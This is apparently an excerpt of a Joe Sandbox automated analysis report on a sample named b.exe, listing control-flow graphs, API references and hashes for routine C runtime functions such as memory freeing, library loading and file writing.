                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                    • Instruction ID: 769bd6fa7e39ee67619f80fe6cb6cd1d9e4a6b53ba92a4f05ff3e5f5aef68744
                                                                    • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                                    • Instruction Fuzzy Hash: 6AE08C32912228EBCB14CBC8C944D9AF3FCEB48B44F1144A6B509D3620D270DE00C7D0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1842 6cde6958-6cde696c 1843 6cde696e-6cde6973 1842->1843 1844 6cde69da-6cde69e2 1842->1844 1843->1844 1847 6cde6975-6cde697a 1843->1847 1845 6cde6a29-6cde6a41 call 6cde6ac9 1844->1845 1846 6cde69e4-6cde69e7 1844->1846 1855 6cde6a44-6cde6a4b 1845->1855 1846->1845 1848 6cde69e9-6cde6a26 call 6cde4273 * 4 1846->1848 1847->1844 1850 6cde697c-6cde697f 1847->1850 1848->1845 1850->1844 1853 6cde6981-6cde6989 1850->1853 1856 6cde698b-6cde698e 1853->1856 1857 6cde69a3-6cde69ab 1853->1857 1861 6cde6a4d-6cde6a51 1855->1861 1862 6cde6a6a-6cde6a6e 1855->1862 1856->1857 1863 6cde6990-6cde69a2 call 6cde4273 call 6cde8887 1856->1863 1859 6cde69ad-6cde69b0 1857->1859 1860 6cde69c5-6cde69d9 call 6cde4273 * 2 1857->1860 1859->1860 1865 6cde69b2-6cde69c4 call 6cde4273 call 6cde8985 1859->1865 1860->1844 1869 6cde6a67 1861->1869 1870 6cde6a53-6cde6a56 1861->1870 1866 6cde6a86-6cde6a92 1862->1866 1867 6cde6a70-6cde6a75 1862->1867 1863->1857 1865->1860 1866->1855 1879 6cde6a94-6cde6a9f call 6cde4273 1866->1879 1876 6cde6a77-6cde6a7a 1867->1876 1877 6cde6a83 1867->1877 1869->1862 1870->1869 1872 6cde6a58-6cde6a66 call 6cde4273 * 2 1870->1872 1872->1869 1876->1877 1884 6cde6a7c-6cde6a82 call 6cde4273 1876->1884 1877->1866 1884->1877
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 6CDE699C
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88A4
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88B6
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88C8
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88DA
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88EC
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE88FE
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8910
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8922
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8934
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8946
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE8958
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE896A
                                                                      • Part of subcall function 6CDE8887: _free.LIBCMT ref: 6CDE897C
                                                                    • _free.LIBCMT ref: 6CDE6991
                                                                      • Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
                                                                      • Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B
                                                                    • _free.LIBCMT ref: 6CDE69B3
                                                                    • _free.LIBCMT ref: 6CDE69C8
                                                                    • _free.LIBCMT ref: 6CDE69D3
                                                                    • _free.LIBCMT ref: 6CDE69F5
                                                                    • _free.LIBCMT ref: 6CDE6A08
                                                                    • _free.LIBCMT ref: 6CDE6A16
                                                                    • _free.LIBCMT ref: 6CDE6A21
                                                                    • _free.LIBCMT ref: 6CDE6A59
                                                                    • _free.LIBCMT ref: 6CDE6A60
                                                                    • _free.LIBCMT ref: 6CDE6A7D
                                                                    • _free.LIBCMT ref: 6CDE6A95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 01d2ff62abe81e29c780f1eadbc3f513cc07aaa5d6d988c8f09993dcb32c7f92
                                                                    • Instruction ID: b9a186b91192a87faf355150ccd1932f148235c2870b17effc71c049332f54e9
                                                                    • Opcode Fuzzy Hash: 01d2ff62abe81e29c780f1eadbc3f513cc07aaa5d6d988c8f09993dcb32c7f92
                                                                    • Instruction Fuzzy Hash: 31314C31A04609DFEB109FB9E844B9A77E8EF08318F20C52AE169D7A74DB70E955C734

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1929 6cde3b33-6cde3b46 1930 6cde3b48-6cde3b51 call 6cde4273 1929->1930 1931 6cde3b52-6cde3bff call 6cde4273 * 9 call 6cde395f call 6cde39ca 1929->1931 1930->1931
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 8d0603224a275c8683147d6c84845a7ba3abb9e501501042f1b644fde2144a1c
                                                                    • Instruction ID: 2072c2fa5d50dbfba4eff300c5ffdc81f3b743cea28b816ccdb841a9428e707c
                                                                    • Opcode Fuzzy Hash: 8d0603224a275c8683147d6c84845a7ba3abb9e501501042f1b644fde2144a1c
                                                                    • Instruction Fuzzy Hash: C2218576D04108FFCF41DFD4C884DDE7BB9AF08244F0081A6A6159B635DB71EA58CBA4

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1956 6cde2110-6cde2161 call 6cdeada0 call 6cde20d0 call 6cde2557 1963 6cde21bd-6cde21c0 1956->1963 1964 6cde2163-6cde2175 1956->1964 1965 6cde21c2-6cde21cf call 6cde2540 1963->1965 1966 6cde21e0-6cde21e9 1963->1966 1964->1966 1967 6cde2177-6cde218e 1964->1967 1972 6cde21d4-6cde21dd call 6cde20d0 1965->1972 1969 6cde21a4 1967->1969 1970 6cde2190-6cde219e call 6cde24e0 1967->1970 1971 6cde21a7-6cde21ac 1969->1971 1979 6cde21b4-6cde21bb 1970->1979 1980 6cde21a0 1970->1980 1971->1967 1974 6cde21ae-6cde21b0 1971->1974 1972->1966 1974->1966 1977 6cde21b2 1974->1977 1977->1972 1979->1972 1981 6cde21ea-6cde21f3 1980->1981 1982 6cde21a2 1980->1982 1983 6cde222d-6cde223d call 6cde2520 1981->1983 1984 6cde21f5-6cde21fc 1981->1984 1982->1971 1990 6cde223f-6cde224e call 6cde2540 1983->1990 1991 6cde2251-6cde226d call 6cde20d0 call 6cde2500 1983->1991 1984->1983 1986 6cde21fe-6cde220d call 6cdeac40 1984->1986 1992 6cde220f-6cde2227 1986->1992 1993 6cde222a 1986->1993 1990->1991 1992->1993 1993->1983
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CDE2147
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDE214F
                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CDE21D8
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDE2203
                                                                    • _ValidateLocalCookies.LIBCMT ref: 6CDE2258
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: ce8da64769ec86690e3acafb58d51eec126dcece9f397e60415a0eaa7af780d1
                                                                    • Instruction ID: 4223378f314a7f72bffd09648bdb0f669f0b5a4f0197cea31d0341957df23f44
                                                                    • Opcode Fuzzy Hash: ce8da64769ec86690e3acafb58d51eec126dcece9f397e60415a0eaa7af780d1
                                                                    • Instruction Fuzzy Hash: 5B418534A0120ADBCF00CF69CC48A9EBBB5AF4932CF148156E9185BBA1D775EA45CB91

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2002 6cde579a-6cde57a6 2003 6cde584d-6cde5850 2002->2003 2004 6cde57ab-6cde57bc 2003->2004 2005 6cde5856 2003->2005 2006 6cde57be-6cde57c1 2004->2006 2007 6cde57c9-6cde57e2 LoadLibraryExW 2004->2007 2008 6cde5858-6cde585c 2005->2008 2009 6cde584a 2006->2009 2010 6cde57c7 2006->2010 2011 6cde5834-6cde583d 2007->2011 2012 6cde57e4-6cde57ed GetLastError 2007->2012 2009->2003 2014 6cde5846-6cde5848 2010->2014 2013 6cde583f-6cde5840 FreeLibrary 2011->2013 2011->2014 2015 6cde57ef-6cde5801 call 6cde38d3 2012->2015 2016 6cde5824 2012->2016 2013->2014 2014->2009 2017 6cde585d-6cde585f 2014->2017 2015->2016 2022 6cde5803-6cde5815 call 6cde38d3 2015->2022 2019 6cde5826-6cde5828 2016->2019 2017->2008 2019->2011 2021 6cde582a-6cde5832 2019->2021 2021->2009 2022->2016 2025 6cde5817-6cde5822 LoadLibraryExW 2022->2025 2025->2019
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 0-537541572
                                                                    • Opcode ID: d871e4c8fdca76d2d7a0ad1005ac56d3cb7f89090e755d86ee0434a43c70c586
                                                                    • Instruction ID: a41692c5f94b10059d55869611bcfe343b9119275919e2cc3a73d61c993534a2
                                                                    • Opcode Fuzzy Hash: d871e4c8fdca76d2d7a0ad1005ac56d3cb7f89090e755d86ee0434a43c70c586
                                                                    • Instruction Fuzzy Hash: 9021D831A06321EBDB1197258CC4A0ABA789F4E7F8F211624ED55AB6B1F630F90085E4
                                                                    APIs
                                                                      • Part of subcall function 6CDE89EE: _free.LIBCMT ref: 6CDE8A13
                                                                    • _free.LIBCMT ref: 6CDE8A74
                                                                      • Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
                                                                      • Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B
                                                                    • _free.LIBCMT ref: 6CDE8A7F
                                                                    • _free.LIBCMT ref: 6CDE8A8A
                                                                    • _free.LIBCMT ref: 6CDE8ADE
                                                                    • _free.LIBCMT ref: 6CDE8AE9
                                                                    • _free.LIBCMT ref: 6CDE8AF4
                                                                    • _free.LIBCMT ref: 6CDE8AFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                    • Instruction ID: 007ac3d7a8dbc4299f004e5d3b15991b25003e2174c5cf9dab84590991a3e9fb
                                                                    • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                    • Instruction Fuzzy Hash: F011EF71D41F04AAD920ABB4CC4AFCF7BDD6F09704F408816A299A6A70DB65F6188771
                                                                    APIs
                                                                    • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CDE7B87
                                                                    • __fassign.LIBCMT ref: 6CDE7D6C
                                                                    • __fassign.LIBCMT ref: 6CDE7D89
                                                                    • WriteFile.KERNEL32(?,6CDE6323,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDE7DD1
                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CDE7E11
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CDE7EB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 1735259414-0
                                                                    • Opcode ID: 8563f6d074223fe19585ac9b829ee2977a3dba2137bf75c25de561eddac6d0e9
                                                                    • Instruction ID: e623963f91931de79e2d19875d603c0448fefb2e4ab2da5af8194b3447c4187b
                                                                    • Opcode Fuzzy Hash: 8563f6d074223fe19585ac9b829ee2977a3dba2137bf75c25de561eddac6d0e9
                                                                    • Instruction Fuzzy Hash: 15C1A075D00259EFDF01CFA8C8809EDBBB9AF4D318F29416AE855B7752D231AD06CB60
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000001,?,6CDE22B5,6CDE13E0,6CDE0DF9,?,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120,0000000C,6CDE112A), ref: 6CDE25F5
                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CDE2603
                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CDE261C
                                                                    • SetLastError.KERNEL32(00000000,6CDE1031,?,00000001,?,?,00000001,?,6CDF0120,0000000C,6CDE112A,?,00000001,?), ref: 6CDE266E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLastValue___vcrt_
                                                                    • String ID:
                                                                    • API String ID: 3852720340-0
                                                                    • Opcode ID: 81bb885f29e7a7c75346b8730a43deeef2afa2140ed72b97c92efc336ccb0120
                                                                    • Instruction ID: 0602ca25e8472d355331250940d8d8cf6b604fe7714bdbe5aeca36f88ef10972
                                                                    • Opcode Fuzzy Hash: 81bb885f29e7a7c75346b8730a43deeef2afa2140ed72b97c92efc336ccb0120
                                                                    • Instruction Fuzzy Hash: 0E01B532209717AEFA11277A5CCC95A2775EB0F77DF20032DE22445AF1EF5258045154
                                                                    Strings
                                                                    • C:\Users\user\Desktop\b.exe, xrefs: 6CDE4AE4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Users\user\Desktop\b.exe
                                                                    • API String ID: 0-2794046411
                                                                    • Opcode ID: ee8e171f9a73802d6827d775a336c1d7b2ba800ed840ffd6e4975c858e39834b
                                                                    • Instruction ID: 29e1f84c0acb62b6af35eee8f2bfed78702ec94e1f52d7667002ae6b93c93095
                                                                    • Opcode Fuzzy Hash: ee8e171f9a73802d6827d775a336c1d7b2ba800ed840ffd6e4975c858e39834b
                                                                    • Instruction Fuzzy Hash: 97219F71604619BF9B10AFE6CC80EAB77ADAF4936C7048614F564A7A70E730EC0097A0
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6CDE2824,00000000,?,00000001,00000000,?,6CDE289B,00000001,FlsFree,6CDEBD3C,FlsFree,00000000), ref: 6CDE27F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID: api-ms-
                                                                    • API String ID: 3664257935-2084034818
                                                                    • Opcode ID: 96f0d25dd448f86b0d151f0b87635c8a2969e0b5fa15a3978fa8e5b905400982
                                                                    • Instruction ID: b9f25c10c49aa635019474e39d4fe02ec283f9875bb4edaf135160cabc252f37
                                                                    • Opcode Fuzzy Hash: 96f0d25dd448f86b0d151f0b87635c8a2969e0b5fa15a3978fa8e5b905400982
                                                                    • Instruction Fuzzy Hash: D4119431A45627EBEB127B6A8C487493378AF0B778F150210E951E7AD0E660F90086E5
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CDE2DCC,?,?,6CDE2D94,?,00000001,?), ref: 6CDE2E2F
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CDE2E42
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6CDE2DCC,?,?,6CDE2D94,?,00000001,?), ref: 6CDE2E65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 7ac2c209e062a6167fcee29ec1a4785b636371346ba2bd129aa041100b3aebb8
                                                                    • Instruction ID: 1400aaeab89d8c828cd968814317a7fb4b4dafbc64b7ad57388e621d02f04004
                                                                    • Opcode Fuzzy Hash: 7ac2c209e062a6167fcee29ec1a4785b636371346ba2bd129aa041100b3aebb8
                                                                    • Instruction Fuzzy Hash: 30F05E3060171AFBEF119B50CC09B9E7A79AB09A59F100054A611A21A0CB30EA00DB98
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 6CDE74BB
                                                                    • __alloca_probe_16.LIBCMT ref: 6CDE7581
                                                                    • __freea.LIBCMT ref: 6CDE75ED
                                                                      • Part of subcall function 6CDE65EC: HeapAlloc.KERNEL32(00000000,6CDE6323,6CDE6323,?,6CDE5023,00000220,?,6CDE6323,?,?,?,?,6CDE8441,00000001,?,?), ref: 6CDE661E
                                                                    • __freea.LIBCMT ref: 6CDE75F6
                                                                    • __freea.LIBCMT ref: 6CDE7619
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: 9333fdb78d5ef5a941d3a2e75946795a00140250bc3f0453316b1f18e6cdecea
                                                                    • Instruction ID: 9ac546f4a20890a702fdc5ab6e683571a00e36de7a06f8c74f5a2c815327f9f3
                                                                    • Opcode Fuzzy Hash: 9333fdb78d5ef5a941d3a2e75946795a00140250bc3f0453316b1f18e6cdecea
                                                                    • Instruction Fuzzy Hash: 4051C172601616BBEF558F64CC40EAF3AA9EF49758F220569FD149BA61E730DD00CBA0
                                                                    APIs
                                                                    • _free.LIBCMT ref: 6CDE899D
                                                                      • Part of subcall function 6CDE4273: HeapFree.KERNEL32(00000000,00000000,?,6CDE34AC), ref: 6CDE4289
                                                                      • Part of subcall function 6CDE4273: GetLastError.KERNEL32(?,?,6CDE34AC), ref: 6CDE429B
                                                                    • _free.LIBCMT ref: 6CDE89AF
                                                                    • _free.LIBCMT ref: 6CDE89C1
                                                                    • _free.LIBCMT ref: 6CDE89D3
                                                                    • _free.LIBCMT ref: 6CDE89E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: b6d51b9c3a30749caeabb597ec878d122ba05890ed60a16222c2a3528c1205f7
                                                                    • Instruction ID: 7405e96ea8d29318d02d1ca75ad166c62264d85c3ae48a95150cff50be9b49cb
                                                                    • Opcode Fuzzy Hash: b6d51b9c3a30749caeabb597ec878d122ba05890ed60a16222c2a3528c1205f7
                                                                    • Instruction Fuzzy Hash: 6DF0FF31A056449BCA10EFA8EC85C5B77F9AB09728760C81AE465D7E60C734F9818AF9
                                                                    APIs
                                                                      • Part of subcall function 6CDE4999: _free.LIBCMT ref: 6CDE49A7
                                                                      • Part of subcall function 6CDE556D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CDE75E3,?,00000000,00000000), ref: 6CDE5619
                                                                    • GetLastError.KERNEL32 ref: 6CDE43DF
                                                                    • __dosmaperr.LIBCMT ref: 6CDE43E6
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDE4425
                                                                    • __dosmaperr.LIBCMT ref: 6CDE442C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1955097033.000000006CDD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1955084455.000000006CDD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955120544.000000006CDEB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955137853.000000006CDF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1955190863.000000006CE42000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_6cdd0000_b.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                    • String ID:
                                                                    • API String ID: 167067550-0
                                                                    • Opcode ID: 73794ac943604b176beb4191737e3c2e9e4b7cdd8c13a38c3fb23333b024085e
